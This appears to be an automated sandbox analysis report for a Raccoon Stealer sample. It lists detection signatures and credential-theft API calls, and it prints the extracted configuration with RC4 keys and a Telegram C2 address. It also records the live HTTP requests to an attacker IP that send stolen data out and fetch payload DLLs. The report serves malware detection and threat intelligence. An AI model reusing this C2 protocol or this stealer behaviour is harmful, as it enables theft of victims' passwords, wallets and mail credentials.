Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.14529.6378

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetect.malware1.14529.6378 (renamed file extension from 6378 to exe)
Analysis ID: 491833
MD5: e283621cd5dea00d95791a88eecda925
SHA1: c1fca8da67debe3d9d67cf6def926d81c8bb3350
SHA256: 2becdf23ad63dfcb341ee332fa50623f0cf5e4fa5f0c6c854cd4e59ce8be3ce6
Tags: exe
Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Binary contains a suspicious time stamp
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Virustotal: Detection: 33%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe ReversingLabs: Detection: 37%
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 1_2_0042A130
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 1_2_00429F5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 1_2_00434A5F

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043EFDD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49745 -> 185.138.164.150:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49745 -> 185.138.164.150:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://t.me/agrybirdsgamerept
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1405Host: 185.138.164.150
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:24 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytes
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:28 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327260135.0000000002DB2000.00000004.00000001.sdmp String found in binary or memory: http://185.138.164.150/
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323065453.0000000002DB2000.00000004.00000001.sdmp String found in binary or memory: http://185.138.164.150/;r
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.1.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://ocsp.accv.es0
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://repository.swisssign.com/0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.1.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.1.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: https://t.me/agrybirdsgamerept
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0:
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0th
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0de
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: unknown DNS traffic detected: queries for: t.me
